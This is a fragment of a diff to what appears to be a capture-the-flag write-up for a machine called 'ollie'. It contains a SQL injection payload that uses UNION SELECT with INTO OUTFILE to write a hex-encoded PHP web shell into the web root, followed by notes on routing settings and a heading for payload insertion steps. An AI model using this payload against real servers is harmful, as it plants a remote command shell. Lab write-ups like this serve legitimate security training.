l0n3m4n/Writeups/ollie/ollie.md

 # command converted into hex decimal and write into specified path
 " UNION SELECT 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE "/var/www/html/shell.php" -- -
 ```
 > Note: In the routing information, there is already configured peer name `ThisIsTheOne`.
-You can also add a new peer name using the instructions below.
+You can also add a new configuration using the instructions below.

 ## Steps to insert payload
 - Go to `settings` and enable the routing module